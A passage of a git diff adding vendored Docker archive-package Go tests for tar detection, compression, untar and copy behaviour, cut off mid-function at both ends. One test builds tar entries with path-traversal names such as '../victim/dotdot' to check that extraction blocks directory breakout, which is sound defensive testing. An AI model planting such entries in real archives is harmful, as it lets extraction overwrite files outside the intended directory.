+	checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d2", WhiteoutOpaqueDir), 0750)
+	checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600)
+	checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660)
+	checkFileMode(t, filepath.Join(dst, "d3", WhiteoutPrefix+"f1"), 0600)
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go
new file mode 100644
index 0000000000..54acbf2856
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go
@@ -0,0 +1,7 @@
+// +build !linux
+
+package archive
+
+func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go
new file mode 100644
index 0000000000..b883be33ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go
@@ -0,0 +1,1162 @@
+package archive
+
+import (
+	"archive/tar"
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+)
+
+var tmp string
+
+func init() {
+	tmp = "/tmp/"
+	if runtime.GOOS == "windows" {
+		tmp = os.Getenv("TEMP") + `\`
+	}
+}
+
+func TestIsArchiveNilHeader(t *testing.T) {
+	out := IsArchive(nil)
+	if out {
+		t.Fatalf("isArchive should return false as nil is not a valid archive header")
+	}
+}
+
+func TestIsArchiveInvalidHeader(t *testing.T) {
+	header := []byte{0x00, 0x01, 0x02}
+	out := IsArchive(header)
+	if out {
+		t.Fatalf("isArchive should return false as %s is not a valid archive header", header)
+	}
+}
+
+func TestIsArchiveBzip2(t *testing.T) {
+	header := []byte{0x42, 0x5A, 0x68}
+	out := IsArchive(header)
+	if !out {
+		t.Fatalf("isArchive should return true as %s is a bz2 header", header)
+	}
+}
+
+func TestIsArchive7zip(t *testing.T) {
+	header := []byte{0x50, 0x4b, 0x03, 0x04}
+	out := IsArchive(header)
+	if out {
+		t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header)
+	}
+}
+
+func TestIsArchivePathDir(t *testing.T) {
+	cmd := exec.Command("sh", "-c", "mkdir -p /tmp/archivedir")
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("Fail to create an archive file for test : %s.", output)
+	}
+	if IsArchivePath(tmp + "archivedir") {
+		t.Fatalf("Incorrectly recognised directory as an archive")
+	}
+}
+
+func TestIsArchivePathInvalidFile(t *testing.T) {
+	cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1024 count=1 of=/tmp/archive && gzip --stdout /tmp/archive > /tmp/archive.gz")
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("Fail to create an archive file for test : %s.", output)
+	}
+	if IsArchivePath(tmp + "archive") {
+		t.Fatalf("Incorrectly recognised invalid tar path as archive")
+	}
+	if IsArchivePath(tmp + "archive.gz") {
+		t.Fatalf("Incorrectly recognised invalid compressed tar path as archive")
+	}
+}
+
+func TestIsArchivePathTar(t *testing.T) {
+	var whichTar string
+	if runtime.GOOS == "solaris" {
+		whichTar = "gtar"
+	} else {
+		whichTar = "tar"
+	}
+	cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar)
+	cmd := exec.Command("sh", "-c", cmdStr)
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("Fail to create an archive file for test : %s.", output)
+	}
+	if !IsArchivePath(tmp + "/archive") {
+		t.Fatalf("Did not recognise valid tar path as archive")
+	}
+	if !IsArchivePath(tmp + "archive.gz") {
+		t.Fatalf("Did not recognise valid compressed tar path as archive")
+	}
+}
+
+func testDecompressStream(t *testing.T, ext, compressCommand string) {
+	cmd := exec.Command("sh", "-c",
+		fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand))
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("Failed to create an archive file for test : %s.", output)
+	}
+	filename := "archive." + ext
+	archive, err := os.Open(tmp + filename)
+	if err != nil {
+		t.Fatalf("Failed to open file %s: %v", filename, err)
+	}
+	defer archive.Close()
+
+	r, err := DecompressStream(archive)
+	if err != nil {
+		t.Fatalf("Failed to decompress %s: %v", filename, err)
+	}
+	if _, err = ioutil.ReadAll(r); err != nil {
+		t.Fatalf("Failed to read the decompressed stream: %v ", err)
+	}
+	if err = r.Close(); err != nil {
+		t.Fatalf("Failed to close the decompressed stream: %v ", err)
+	}
+}
+
+func TestDecompressStreamGzip(t *testing.T) {
+	testDecompressStream(t, "gz", "gzip -f")
+}
+
+func TestDecompressStreamBzip2(t *testing.T) {
+	testDecompressStream(t, "bz2", "bzip2 -f")
+}
+
+func TestDecompressStreamXz(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("Xz not present in msys2")
+	}
+	testDecompressStream(t, "xz", "xz -f")
+}
+
+func TestCompressStreamXzUnsuported(t *testing.T) {
+	dest, err := os.Create(tmp + "dest")
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+	defer dest.Close()
+
+	_, err = CompressStream(dest, Xz)
+	if err == nil {
+		t.Fatalf("Should fail as xz is unsupported for compression format.")
+	}
+}
+
+func TestCompressStreamBzip2Unsupported(t *testing.T) {
+	dest, err := os.Create(tmp + "dest")
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+	defer dest.Close()
+
+	_, err = CompressStream(dest, Xz)
+	if err == nil {
+		t.Fatalf("Should fail as xz is unsupported for compression format.")
+	}
+}
+
+func TestCompressStreamInvalid(t *testing.T) {
+	dest, err := os.Create(tmp + "dest")
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+	defer dest.Close()
+
+	_, err = CompressStream(dest, -1)
+	if err == nil {
+		t.Fatalf("Should fail as xz is unsupported for compression format.")
+	}
+}
+
+func TestExtensionInvalid(t *testing.T) {
+	compression := Compression(-1)
+	output := compression.Extension()
+	if output != "" {
+		t.Fatalf("The extension of an invalid compression should be an empty string.")
+	}
+}
+
+func TestExtensionUncompressed(t *testing.T) {
+	compression := Uncompressed
+	output := compression.Extension()
+	if output != "tar" {
+		t.Fatalf("The extension of an uncompressed archive should be 'tar'.")
+	}
+}
+func TestExtensionBzip2(t *testing.T) {
+	compression := Bzip2
+	output := compression.Extension()
+	if output != "tar.bz2" {
+		t.Fatalf("The extension of a bzip2 archive should be 'tar.bz2'")
+	}
+}
+func TestExtensionGzip(t *testing.T) {
+	compression := Gzip
+	output := compression.Extension()
+	if output != "tar.gz" {
+		t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'")
+	}
+}
+func TestExtensionXz(t *testing.T) {
+	compression := Xz
+	output := compression.Extension()
+	if output != "tar.xz" {
+		t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'")
+	}
+}
+
+func TestCmdStreamLargeStderr(t *testing.T) {
+	cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello")
+	out, _, err := cmdStream(cmd, nil)
+	if err != nil {
+		t.Fatalf("Failed to start command: %s", err)
+	}
+	errCh := make(chan error)
+	go func() {
+		_, err := io.Copy(ioutil.Discard, out)
+		errCh <- err
+	}()
+	select {
+	case err := <-errCh:
+		if err != nil {
+			t.Fatalf("Command should not have failed (err=%.100s...)", err)
+		}
+	case <-time.After(5 * time.Second):
+		t.Fatalf("Command did not complete in 5 seconds; probable deadlock")
+	}
+}
+
+func TestCmdStreamBad(t *testing.T) {
+	// TODO Windows: Figure out why this is failing in CI but not locally
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows CI machines")
+	}
+	badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1")
+	out, _, err := cmdStream(badCmd, nil)
+	if err != nil {
+		t.Fatalf("Failed to start command: %s", err)
+	}
+	if output, err := ioutil.ReadAll(out); err == nil {
+		t.Fatalf("Command should have failed")
+	} else if err.Error() != "exit status 1: error couldn't reverse the phase pulser\n" {
+		t.Fatalf("Wrong error value (%s)", err)
+	} else if s := string(output); s != "hello\n" {
+		t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output)
+	}
+}
+
+func TestCmdStreamGood(t *testing.T) {
+	cmd := exec.Command("sh", "-c", "echo hello; exit 0")
+	out, _, err := cmdStream(cmd, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if output, err := ioutil.ReadAll(out); err != nil {
+		t.Fatalf("Command should not have failed (err=%s)", err)
+	} else if s := string(output); s != "hello\n" {
+		t.Fatalf("Command output should be '%s', not '%s'", "hello\\n", output)
+	}
+}
+
+func TestUntarPathWithInvalidDest(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tempFolder)
+	invalidDestFolder := filepath.Join(tempFolder, "invalidDest")
+	// Create a src file
+	srcFile := filepath.Join(tempFolder, "src")
+	tarFile := filepath.Join(tempFolder, "src.tar")
+	os.Create(srcFile)
+	os.Create(invalidDestFolder) // being a file (not dir) should cause an error
+
+	// Translate back to Unix semantics as next exec.Command is run under sh
+	srcFileU := srcFile
+	tarFileU := tarFile
+	if runtime.GOOS == "windows" {
+		tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar"
+		srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src"
+	}
+
+	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
+	_, err = cmd.CombinedOutput()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = UntarPath(tarFile, invalidDestFolder)
+	if err == nil {
+		t.Fatalf("UntarPath with invalid destination path should throw an error.")
+	}
+}
+
+func TestUntarPathWithInvalidSrc(t *testing.T) {
+	dest, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+	defer os.RemoveAll(dest)
+	err = UntarPath("/invalid/path", dest)
+	if err == nil {
+		t.Fatalf("UntarPath with invalid src path should throw an error.")
+	}
+}
+
+func TestUntarPath(t *testing.T) {
+	tmpFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpFolder)
+	srcFile := filepath.Join(tmpFolder, "src")
+	tarFile := filepath.Join(tmpFolder, "src.tar")
+	os.Create(filepath.Join(tmpFolder, "src"))
+
+	destFolder := filepath.Join(tmpFolder, "dest")
+	err = os.MkdirAll(destFolder, 0740)
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+
+	// Translate back to Unix semantics as next exec.Command is run under sh
+	srcFileU := srcFile
+	tarFileU := tarFile
+	if runtime.GOOS == "windows" {
+		tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar"
+		srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src"
+	}
+	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
+	_, err = cmd.CombinedOutput()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = UntarPath(tarFile, destFolder)
+	if err != nil {
+		t.Fatalf("UntarPath shouldn't throw an error, %s.", err)
+	}
+	expectedFile := filepath.Join(destFolder, srcFileU)
+	_, err = os.Stat(expectedFile)
+	if err != nil {
+		t.Fatalf("Destination folder should contain the source file but did not.")
+	}
+}
+
+// Do the same test as above but with the destination as file, it should fail
+func TestUntarPathWithDestinationFile(t *testing.T) {
+	tmpFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpFolder)
+	srcFile := filepath.Join(tmpFolder, "src")
+	tarFile := filepath.Join(tmpFolder, "src.tar")
+	os.Create(filepath.Join(tmpFolder, "src"))
+
+	// Translate back to Unix semantics as next exec.Command is run under sh
+	srcFileU := srcFile
+	tarFileU := tarFile
+	if runtime.GOOS == "windows" {
+		tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar"
+		srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src"
+	}
+	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
+	_, err = cmd.CombinedOutput()
+	if err != nil {
+		t.Fatal(err)
+	}
+	destFile := filepath.Join(tmpFolder, "dest")
+	_, err = os.Create(destFile)
+	if err != nil {
+		t.Fatalf("Fail to create the destination file")
+	}
+	err = UntarPath(tarFile, destFile)
+	if err == nil {
+		t.Fatalf("UntarPath should throw an error if the destination if a file")
+	}
+}
+
+// Do the same test as above but with the destination folder already exists
+// and the destination file is a directory
+// It's working, see https://github.com/docker/docker/issues/10040
+func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) {
+	tmpFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpFolder)
+	srcFile := filepath.Join(tmpFolder, "src")
+	tarFile := filepath.Join(tmpFolder, "src.tar")
+	os.Create(srcFile)
+
+	// Translate back to Unix semantics as next exec.Command is run under sh
+	srcFileU := srcFile
+	tarFileU := tarFile
+	if runtime.GOOS == "windows" {
+		tarFileU = "/tmp/" + filepath.Base(filepath.Dir(tarFile)) + "/src.tar"
+		srcFileU = "/tmp/" + filepath.Base(filepath.Dir(srcFile)) + "/src"
+	}
+
+	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
+	_, err = cmd.CombinedOutput()
+	if err != nil {
+		t.Fatal(err)
+	}
+	destFolder := filepath.Join(tmpFolder, "dest")
+	err = os.MkdirAll(destFolder, 0740)
+	if err != nil {
+		t.Fatalf("Fail to create the destination folder")
+	}
+	// Let's create a folder that will has the same path as the extracted file (from tar)
+	destSrcFileAsFolder := filepath.Join(destFolder, srcFileU)
+	err = os.MkdirAll(destSrcFileAsFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = UntarPath(tarFile, destFolder)
+	if err != nil {
+		t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder")
+	}
+}
+
+func TestCopyWithTarInvalidSrc(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(nil)
+	}
+	destFolder := filepath.Join(tempFolder, "dest")
+	invalidSrc := filepath.Join(tempFolder, "doesnotexists")
+	err = os.MkdirAll(destFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = CopyWithTar(invalidSrc, destFolder)
+	if err == nil {
+		t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.")
+	}
+}
+
+func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(nil)
+	}
+	srcFolder := filepath.Join(tempFolder, "src")
+	inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists")
+	err = os.MkdirAll(srcFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = CopyWithTar(srcFolder, inexistentDestFolder)
+	if err != nil {
+		t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.")
+	}
+	_, err = os.Stat(inexistentDestFolder)
+	if err != nil {
+		t.Fatalf("CopyWithTar with an inexistent folder should create it.")
+	}
+}
+
+// Test CopyWithTar with a file as src
+func TestCopyWithTarSrcFile(t *testing.T) {
+	folder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(folder)
+	dest := filepath.Join(folder, "dest")
+	srcFolder := filepath.Join(folder, "src")
+	src := filepath.Join(folder, filepath.Join("src", "src"))
+	err = os.MkdirAll(srcFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = os.MkdirAll(dest, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ioutil.WriteFile(src, []byte("content"), 0777)
+	err = CopyWithTar(src, dest)
+	if err != nil {
+		t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err)
+	}
+	_, err = os.Stat(dest)
+	// FIXME Check the content
+	if err != nil {
+		t.Fatalf("Destination file should be the same as the source.")
+	}
+}
+
+// Test CopyWithTar with a folder as src
+func TestCopyWithTarSrcFolder(t *testing.T) {
+	folder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(folder)
+	dest := filepath.Join(folder, "dest")
+	src := filepath.Join(folder, filepath.Join("src", "folder"))
+	err = os.MkdirAll(src, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = os.MkdirAll(dest, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777)
+	err = CopyWithTar(src, dest)
+	if err != nil {
+		t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err)
+	}
+	_, err = os.Stat(dest)
+	// FIXME Check the content (the file inside)
+	if err != nil {
+		t.Fatalf("Destination folder should contain the source file but did not.")
+	}
+}
+
+func TestCopyFileWithTarInvalidSrc(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tempFolder)
+	destFolder := filepath.Join(tempFolder, "dest")
+	err = os.MkdirAll(destFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	invalidFile := filepath.Join(tempFolder, "doesnotexists")
+	err = CopyFileWithTar(invalidFile, destFolder)
+	if err == nil {
+		t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.")
+	}
+}
+
+func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(nil)
+	}
+	defer os.RemoveAll(tempFolder)
+	srcFile := filepath.Join(tempFolder, "src")
+	inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists")
+	_, err = os.Create(srcFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = CopyFileWithTar(srcFile, inexistentDestFolder)
+	if err != nil {
+		t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.")
+	}
+	_, err = os.Stat(inexistentDestFolder)
+	if err != nil {
+		t.Fatalf("CopyWithTar with an inexistent folder should create it.")
+	}
+	// FIXME Test the src file and content
+}
+
+func TestCopyFileWithTarSrcFolder(t *testing.T) {
+	folder, err := ioutil.TempDir("", "docker-archive-copyfilewithtar-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(folder)
+	dest := filepath.Join(folder, "dest")
+	src := filepath.Join(folder, "srcfolder")
+	err = os.MkdirAll(src, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = os.MkdirAll(dest, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = CopyFileWithTar(src, dest)
+	if err == nil {
+		t.Fatalf("CopyFileWithTar should throw an error with a folder.")
+	}
+}
+
+func TestCopyFileWithTarSrcFile(t *testing.T) {
+	folder, err := ioutil.TempDir("", "docker-archive-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(folder)
+	dest := filepath.Join(folder, "dest")
+	srcFolder := filepath.Join(folder, "src")
+	src := filepath.Join(folder, filepath.Join("src", "src"))
+	err = os.MkdirAll(srcFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = os.MkdirAll(dest, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ioutil.WriteFile(src, []byte("content"), 0777)
+	err = CopyWithTar(src, dest+"/")
+	if err != nil {
+		t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err)
+	}
+	_, err = os.Stat(dest)
+	if err != nil {
+		t.Fatalf("Destination folder should contain the source file but did not.")
+	}
+}
+
+func TestTarFiles(t *testing.T) {
+	// TODO Windows: Figure out how to port this test.
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	// try without hardlinks
+	if err := checkNoChanges(1000, false); err != nil {
+		t.Fatal(err)
+	}
+	// try with hardlinks
+	if err := checkNoChanges(1000, true); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func checkNoChanges(fileNum int, hardlinks bool) error {
+	srcDir, err := ioutil.TempDir("", "docker-test-srcDir")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(srcDir)
+
+	destDir, err := ioutil.TempDir("", "docker-test-destDir")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(destDir)
+
+	_, err = prepareUntarSourceDirectory(fileNum, srcDir, hardlinks)
+	if err != nil {
+		return err
+	}
+
+	err = TarUntar(srcDir, destDir)
+	if err != nil {
+		return err
+	}
+
+	changes, err := ChangesDirs(destDir, srcDir)
+	if err != nil {
+		return err
+	}
+	if len(changes) > 0 {
+		return fmt.Errorf("with %d files and %v hardlinks: expected 0 changes, got %d", fileNum, hardlinks, len(changes))
+	}
+	return nil
+}
+
+func tarUntar(t *testing.T, origin string, options *TarOptions) ([]Change, error) {
+	archive, err := TarWithOptions(origin, options)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer archive.Close()
+
+	buf := make([]byte, 10)
+	if _, err := archive.Read(buf); err != nil {
+		return nil, err
+	}
+	wrap := io.MultiReader(bytes.NewReader(buf), archive)
+
+	detectedCompression := DetectCompression(buf)
+	compression := options.Compression
+	if detectedCompression.Extension() != compression.Extension() {
+		return nil, fmt.Errorf("Wrong compression detected. Actual compression: %s, found %s", compression.Extension(), detectedCompression.Extension())
+	}
+
+	tmp, err := ioutil.TempDir("", "docker-test-untar")
+	if err != nil {
+		return nil, err
+	}
+	defer os.RemoveAll(tmp)
+	if err := Untar(wrap, tmp, nil); err != nil {
+		return nil, err
+	}
+	if _, err := os.Stat(tmp); err != nil {
+		return nil, err
+	}
+
+	return ChangesDirs(origin, tmp)
+}
+
+func TestTarUntar(t *testing.T) {
+	// TODO Windows: Figure out how to fix this test.
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, c := range []Compression{
+		Uncompressed,
+		Gzip,
+	} {
+		changes, err := tarUntar(t, origin, &TarOptions{
+			Compression:     c,
+			ExcludePatterns: []string{"3"},
+		})
+
+		if err != nil {
+			t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err)
+		}
+
+		if len(changes) != 1 || changes[0].Path != "/3" {
+			t.Fatalf("Unexpected differences after tarUntar: %v", changes)
+		}
+	}
+}
+
+func TestTarWithOptions(t *testing.T) {
+	// TODO Windows: Figure out how to fix this test.
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := ioutil.TempDir(origin, "folder"); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil {
+		t.Fatal(err)
+	}
+
+	cases := []struct {
+		opts       *TarOptions
+		numChanges int
+	}{
+		{&TarOptions{IncludeFiles: []string{"1"}}, 2},
+		{&TarOptions{ExcludePatterns: []string{"2"}}, 1},
+		{&TarOptions{ExcludePatterns: []string{"1", "folder*"}}, 2},
+		{&TarOptions{IncludeFiles: []string{"1", "1"}}, 2},
+		{&TarOptions{IncludeFiles: []string{"1"}, RebaseNames: map[string]string{"1": "test"}}, 4},
+	}
+	for _, testCase := range cases {
+		changes, err := tarUntar(t, origin, testCase.opts)
+		if err != nil {
+			t.Fatalf("Error tar/untar when testing inclusion/exclusion: %s", err)
+		}
+		if len(changes) != testCase.numChanges {
+			t.Errorf("Expected %d changes, got %d for %+v:",
+				testCase.numChanges, len(changes), testCase.opts)
+		}
+	}
+}
+
+// Some tar archives such as http://haproxy.1wt.eu/download/1.5/src/devel/haproxy-1.5-dev21.tar.gz
+// use PAX Global Extended Headers.
+// Failing prevents the archives from being uncompressed during ADD
+func TestTypeXGlobalHeaderDoesNotFail(t *testing.T) {
+	hdr := tar.Header{Typeflag: tar.TypeXGlobalHeader}
+	tmpDir, err := ioutil.TempDir("", "docker-test-archive-pax-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+	err = createTarFile(filepath.Join(tmpDir, "pax_global_header"), tmpDir, &hdr, nil, true, nil, false)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Some tar have both GNU specific (huge uid) and Ustar specific (long name) things.
+// Not supposed to happen (should use PAX instead of Ustar for long name) but it does and it should still work.
+func TestUntarUstarGnuConflict(t *testing.T) {
+	f, err := os.Open("testdata/broken.tar")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+
+	found := false
+	tr := tar.NewReader(f)
+	// Iterate through the files in the archive.
+	for {
+		hdr, err := tr.Next()
+		if err == io.EOF {
+			// end of tar archive
+			break
+		}
+		if err != nil {
+			t.Fatal(err)
+		}
+		if hdr.Name == "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm" {
+			found = true
+			break
+		}
+	}
+	if !found {
+		t.Fatalf("%s not found in the archive", "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm")
+	}
+}
+
+func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) {
+	fileData := []byte("fooo")
+	for n := 0; n < numberOfFiles; n++ {
+		fileName := fmt.Sprintf("file-%d", n)
+		if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); err != nil {
+			return 0, err
+		}
+		if makeLinks {
+			if err := os.Link(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil {
+				return 0, err
+			}
+		}
+	}
+	totalSize := numberOfFiles * len(fileData)
+	return totalSize, nil
+}
+
+func BenchmarkTarUntar(b *testing.B) {
+	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
+	if err != nil {
+		b.Fatal(err)
+	}
+	tempDir, err := ioutil.TempDir("", "docker-test-untar-destination")
+	if err != nil {
+		b.Fatal(err)
+	}
+	target := filepath.Join(tempDir, "dest")
+	n, err := prepareUntarSourceDirectory(100, origin, false)
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	defer os.RemoveAll(tempDir)
+
+	b.ResetTimer()
+	b.SetBytes(int64(n))
+	for n := 0; n < b.N; n++ {
+		err := TarUntar(origin, target)
+		if err != nil {
+			b.Fatal(err)
+		}
+		os.RemoveAll(target)
+	}
+}
+
+func BenchmarkTarUntarWithLinks(b *testing.B) {
+	origin, err := ioutil.TempDir("", "docker-test-untar-origin")
+	if err != nil {
+		b.Fatal(err)
+	}
+	tempDir, err := ioutil.TempDir("", "docker-test-untar-destination")
+	if err != nil {
+		b.Fatal(err)
+	}
+	target := filepath.Join(tempDir, "dest")
+	n, err := prepareUntarSourceDirectory(100, origin, true)
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer os.RemoveAll(origin)
+	defer os.RemoveAll(tempDir)
+
+	b.ResetTimer()
+	b.SetBytes(int64(n))
+	for n := 0; n < b.N; n++ {
+		err := TarUntar(origin, target)
+		if err != nil {
+			b.Fatal(err)
+		}
+		os.RemoveAll(target)
+	}
+}
+
+func TestUntarInvalidFilenames(t *testing.T) {
+	// TODO Windows: Figure out how to fix this test.
+	if runtime.GOOS == "windows" {
+		t.Skip("Passes but hits breakoutError: platform and architecture is not supported")
+	}
+	for i, headers := range [][]*tar.Header{
+		{
+			{
+				Name:     "../victim/dotdot",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+		{
+			{
+				// Note the leading slash
+				Name:     "/../victim/slash-dotdot",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
+		if err := testBreakout("untar", "docker-TestUntarInvalidFilenames", headers); err != nil {
+			t.Fatalf("i=%d. %v", i, err)
+		}
+	}
+}
+
+func TestUntarHardlinkToSymlink(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	if runtime.GOOS == "windows" {
+		t.Skip("hardlinks on Windows")
+	}
+	for i, headers := range [][]*tar.Header{
+		{
+			{
+				Name:     "symlink1",
+				Typeflag: tar.TypeSymlink,
+				Linkname: "regfile",
+				Mode:     0644,
+			},
+			{
+				Name:     "symlink2",
+				Typeflag: tar.TypeLink,
+				Linkname: "symlink1",
+				Mode:     0644,
+			},
+			{
+				Name:     "regfile",
+				Typeflag: tar.TypeReg,
+				Mode:     0644,
+			},
+		},
+	} {
